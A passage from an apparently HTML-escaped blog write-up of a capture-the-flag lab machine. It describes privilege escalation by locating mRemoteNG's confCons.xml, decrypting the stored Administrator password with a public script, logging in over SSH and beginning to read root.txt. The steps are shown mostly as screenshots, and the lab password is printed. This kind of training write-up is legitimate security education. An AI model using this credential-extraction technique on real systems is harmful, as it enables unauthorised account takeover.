&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB3RyeuM0jl4-Qw4EBBrI-0FIVbcAg0woCTwaXyRML1L8PIxwbrUBFSBoQncxhyphenhyphenGKsqkkO2zDI776cYpsnTT0rNMFRa9XQN7cmp6Uni18DAJrgPCVjUr7cxeuVFdxVN_LE2dZIoMTi6_tk/s1600/screenshot.30.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB3RyeuM0jl4-Qw4EBBrI-0FIVbcAg0woCTwaXyRML1L8PIxwbrUBFSBoQncxhyphenhyphenGKsqkkO2zDI776cYpsnTT0rNMFRa9XQN7cmp6Uni18DAJrgPCVjUr7cxeuVFdxVN_LE2dZIoMTi6_tk/s1600/screenshot.30.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;5 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- As expected &lt;b&gt;Administrator&lt;/b&gt;&#39;s &lt;b&gt;Desktop&lt;/b&gt; is not accessible, so we need some type of Privilege Escalation:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjf5LBXoPZ4S6QfdsQERnHUqzMhReAD5Gr94eACn74jLfp3RE-l1lhH6XAf_x8gFQUPOVnPHwpCh2OpSKmi8KBCcGQyzmh6iuI6Xoxn1mm3XnWsC6qgxT5IrZTB33uOwYwuf9HJ52VXB-9E/s1600/screenshot.31.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjf5LBXoPZ4S6QfdsQERnHUqzMhReAD5Gr94eACn74jLfp3RE-l1lhH6XAf_x8gFQUPOVnPHwpCh2OpSKmi8KBCcGQyzmh6iuI6Xoxn1mm3XnWsC6qgxT5IrZTB33uOwYwuf9HJ52VXB-9E/s1600/screenshot.31.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Browsing around with the command line we check the presence of the&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;.vhd&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&amp;nbsp;and&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;.xml&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&amp;nbsp;files found before:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9bx6_g2lWmoEzODD9RBHNZaQ_LzeFHeHLVNrvAjdxAeA3q5sSfmIY3vqm7f6FcjNhVe_U8LI2xdB7KVM8DOlJKjSF_-5ChCXC927Z-QjZfyxXKZmAX-P1uHFoLNbarfMciMy4U03Gd1Uw/s1600/screenshot.32.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9bx6_g2lWmoEzODD9RBHNZaQ_LzeFHeHLVNrvAjdxAeA3q5sSfmIY3vqm7f6FcjNhVe_U8LI2xdB7KVM8DOlJKjSF_-5ChCXC927Z-QjZfyxXKZmAX-P1uHFoLNbarfMciMy4U03Gd1Uw/s1600/screenshot.32.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Going to &lt;b&gt;L4mpje&lt;/b&gt;&#39;s home folder:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0g2UQPRLuuVwJP2GOImO96YfAJVLKNifNvWwX-HdPU5mSOSH5POXWtxOcb88v1T5UpGQJnwzxLAir9gfghYLyW6b2VRMAt7_JBgwM7SG2zIwU1xBXGuoxE-gR1CSvKBLNGzpopMLBLXyc/s1600/screenshot.34.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0g2UQPRLuuVwJP2GOImO96YfAJVLKNifNvWwX-HdPU5mSOSH5POXWtxOcb88v1T5UpGQJnwzxLAir9gfghYLyW6b2VRMAt7_JBgwM7SG2zIwU1xBXGuoxE-gR1CSvKBLNGzpopMLBLXyc/s1600/screenshot.34.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- However looking for hidden folders we discover a lot more available resources:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNzTao9QtOILwmtP2Ek-vHxvbCORzRWyTe59A1_d4XCEgK0gygHW1CtwbjqdM6UcVMyAajWO-PQOM4QAcXwBPyJdEJooBOBIBlFokE_pwuitPWy4GMFrNta6gGY4GqgbHoQV6QeTC8Pt3T/s1600/screenshot.33.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNzTao9QtOILwmtP2Ek-vHxvbCORzRWyTe59A1_d4XCEgK0gygHW1CtwbjqdM6UcVMyAajWO-PQOM4QAcXwBPyJdEJooBOBIBlFokE_pwuitPWy4GMFrNta6gGY4GqgbHoQV6QeTC8Pt3T/s1600/screenshot.33.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Going inside &lt;b&gt;AppData\Roaming&lt;/b&gt; there is a very interesting folder named &lt;b&gt;mRemoteNG&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij0dHJTBBq4G9SUrDqwd_BKhrYp5f9zdTyNjEkXC75pO2dsVXScx1hjDjQsZuzgQwnOMbNqMMYkznlbWVMgioxML1Z3WgHmKgQNSEZucs0X1mtcYfS2ghMCDoen4VkPIBtccEPNzUk-dA0/s1600/screenshot.36.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij0dHJTBBq4G9SUrDqwd_BKhrYp5f9zdTyNjEkXC75pO2dsVXScx1hjDjQsZuzgQwnOMbNqMMYkznlbWVMgioxML1Z3WgHmKgQNSEZucs0X1mtcYfS2ghMCDoen4VkPIBtccEPNzUk-dA0/s1600/screenshot.36.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgty3RMwjE_mUVG3_dHY_SMNgfMMKAIS8IgWilI9vQB9KStURTJuH3h_om62Fe9neZmhIqgXF5tsdqQzVglPGiIYz5Hi4o351Q_tkG8gaVY5asanAgRwcEYVjoU-RTihdmBtOk093WN4nws/s1600/screenshot.37.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgty3RMwjE_mUVG3_dHY_SMNgfMMKAIS8IgWilI9vQB9KStURTJuH3h_om62Fe9neZmhIqgXF5tsdqQzVglPGiIYz5Hi4o351Q_tkG8gaVY5asanAgRwcEYVjoU-RTihdmBtOk093WN4nws/s1600/screenshot.37.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Actually &lt;b&gt;mRemoteNG&lt;/b&gt; is an open source remote control and connections manager:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDAXvknLcFO7MEvvIUZPS4u5wjnjnIkGjf99ur90fhOvgPMVdv9f7K6xLXTx7uF83TuwCzjaWDKvlU19lWqXq00Pn5PN-Wvu4fQV8eEnsDAYQEN8nOtIxkuePbCDoLcua5Ngm0S9N69u3q/s1600/screenshot.48.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDAXvknLcFO7MEvvIUZPS4u5wjnjnIkGjf99ur90fhOvgPMVdv9f7K6xLXTx7uF83TuwCzjaWDKvlU19lWqXq00Pn5PN-Wvu4fQV8eEnsDAYQEN8nOtIxkuePbCDoLcua5Ngm0S9N69u3q/s1600/screenshot.48.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Reading &lt;b&gt;confCons.xml&lt;/b&gt; we find encrypted credentials for &lt;b&gt;Administrator&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz_sYuxVsY7hhQRVwMlnq15nVslcl15mzp4QE676U_GVfDKIcAtHInQsTnz7DdCPDZ0nmjRonosP1W9JmFnjgxwe_o5bufQv4mIztbCddu3fiUD62S9YoiAdLQJe-84VgOKLdK5dNCe8xQ/s1600/screenshot.38.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz_sYuxVsY7hhQRVwMlnq15nVslcl15mzp4QE676U_GVfDKIcAtHInQsTnz7DdCPDZ0nmjRonosP1W9JmFnjgxwe_o5bufQv4mIztbCddu3fiUD62S9YoiAdLQJe-84VgOKLdK5dNCe8xQ/s1600/screenshot.38.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- It happens that there are online available tools for dealing with&amp;nbsp;&lt;b&gt;mRemoteNG&lt;/b&gt; encrypted credentials, for instance the Python script named &lt;b&gt;mremoteng_decrypt.py&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnCq9YNz5Zaa8DHPvFNUM80aZ8pLDESHUHr994vkxsBZEM7KWmOFAknTpp_hdkFyNZal8W32uSsg5GQwXYamGGv0YFLLVOAV6lni50QPDyPlL6Iq5M71lNkLq3o71MiliCNlFs6SMuguK7/s1600/screenshot.46.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnCq9YNz5Zaa8DHPvFNUM80aZ8pLDESHUHr994vkxsBZEM7KWmOFAknTpp_hdkFyNZal8W32uSsg5GQwXYamGGv0YFLLVOAV6lni50QPDyPlL6Iq5M71lNkLq3o71MiliCNlFs6SMuguK7/s1600/screenshot.46.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Launching the script without parameters to explore available optional arguments:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfML8X1_ivsshIWgqeDlvtSxwjiiFzAXy_QQJo3lmcV8alpwG4fbM0piAXdWaa6xn_ZXLKAuBEBehObdJF-rz_Y6EfdX8-nm7AJauV7vf8UyRDb1cvcH6ith6YpLCZr3zWDBiZ9gtasEUn/s1600/screenshot.39.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfML8X1_ivsshIWgqeDlvtSxwjiiFzAXy_QQJo3lmcV8alpwG4fbM0piAXdWaa6xn_ZXLKAuBEBehObdJF-rz_Y6EfdX8-nm7AJauV7vf8UyRDb1cvcH6ith6YpLCZr3zWDBiZ9gtasEUn/s1600/screenshot.39.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Applying the&lt;b&gt; -s&lt;/b&gt; option, because the encrypted password seems to be encoded with base64 (see the final ==):&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6ZfEXzwhyoel046Rr2RbYOrySYUx9XnHs_JRi_5oKb52GtbzLTa_h7Xm_zdnglHhDfQBImbkUn-kMQPRBXPkNzoDWxsz08aJxvDPQr5pfDqmO4IfIoOJdb7ALl3FjDMFyIjN_otAAkjoo/s1600/screenshot.40.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6ZfEXzwhyoel046Rr2RbYOrySYUx9XnHs_JRi_5oKb52GtbzLTa_h7Xm_zdnglHhDfQBImbkUn-kMQPRBXPkNzoDWxsz08aJxvDPQr5pfDqmO4IfIoOJdb7ALl3FjDMFyIjN_otAAkjoo/s1600/screenshot.40.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- So finally we have the &lt;b&gt;Administrator&lt;/b&gt;&#39;s password:&amp;nbsp;&lt;b&gt;thXLHM96BeKL0ER2&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Connecting with SSH as&amp;nbsp;&lt;b&gt;Administrator&lt;/b&gt; we have a privileged remote shell:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvEEad0NCBxlg0Qg1Ozm7rqa4AROrq6clw-ImaqvsbnGG8Z0PTyOXHP7ANT3AEndbem4Xs88oxbYZSbku0WPfFUHXURSzxhyphenhyphenZhz4eipl0HwokrH_2CgDltA8Q1tOYTUc6gOM8uOLeECoC3/s1600/screenshot.41.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvEEad0NCBxlg0Qg1Ozm7rqa4AROrq6clw-ImaqvsbnGG8Z0PTyOXHP7ANT3AEndbem4Xs88oxbYZSbku0WPfFUHXURSzxhyphenhyphenZhz4eipl0HwokrH_2CgDltA8Q1tOYTUc6gOM8uOLeECoC3/s1600/screenshot.41.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv1QWohPbuhM3epUX8h5SOKQsy-Svs01PK4WtiDoTh1hGXdq4wUYex-HKrDxVL3c0Pww4DOW8f6VEA8ODmSAeR2AyMj0mRRcPFqXq6oJDYszQ6k9dSBBQu3pFAE7sCekBihdiPlqH9SG9C/s1600/screenshot.43.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv1QWohPbuhM3epUX8h5SOKQsy-Svs01PK4WtiDoTh1hGXdq4wUYex-HKrDxVL3c0Pww4DOW8f6VEA8ODmSAeR2AyMj0mRRcPFqXq6oJDYszQ6k9dSBBQu3pFAE7sCekBihdiPlqH9SG9C/s1600/screenshot.43.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9OY7-4utZPm2h3LrSaWdbsMvX4w-6B1_04c1nR2k4DdeVZ60s4pPOIP8rCT-rdGPgWULnqDeJgWfpHImE6BDkHduakcwA2P07z2R1xUNU-zpThB809FNElJuxqpQu5C_a-w6dY_EzY8y-/s1600/screenshot.44.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9OY7-4utZPm2h3LrSaWdbsMvX4w-6B1_04c1nR2k4DdeVZ60s4pPOIP8rCT-rdGPgWULnqDeJgWfpHImE6BDkHduakcwA2P07z2R1xUNU-zpThB809FNElJuxqpQu5C_a-w6dY_EzY8y-/s1600/screenshot.44.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;6 - CAPTURING THE 2nd FLAG&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Reading &lt;b&gt;root.txt&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
